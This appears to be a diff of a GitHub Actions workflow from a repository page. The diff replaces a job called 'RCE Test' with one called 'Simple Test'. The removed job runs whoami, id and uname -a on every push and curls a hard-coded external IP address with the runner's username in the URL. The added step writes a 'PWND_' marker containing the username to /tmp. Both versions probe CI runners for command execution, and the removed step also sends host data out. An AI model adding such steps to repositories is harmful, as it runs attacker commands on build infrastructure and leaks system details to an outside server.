@@ -1,12 +1,8 @@
|
|||||||
name: RCE Test
|
name: Simple Test
|
||||||
on: [push]
|
on: [push]
|
||||||
jobs:
|
jobs:
|
||||||
rce:
|
test:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
steps:
|
steps:
|
||||||
- name: Execute Command
|
- name: Simple Echo
|
||||||
run: |
|
run: echo "PWND_$(whoami)" > /tmp/pwn.txt
|
||||||
whoami
|
|
||||||
id
|
|
||||||
uname -a
|
|
||||||
curl http://202.79.169.91:28016/$(whoami)
|
|
||||||
|
|||||||
Reference in New Issue
Block a user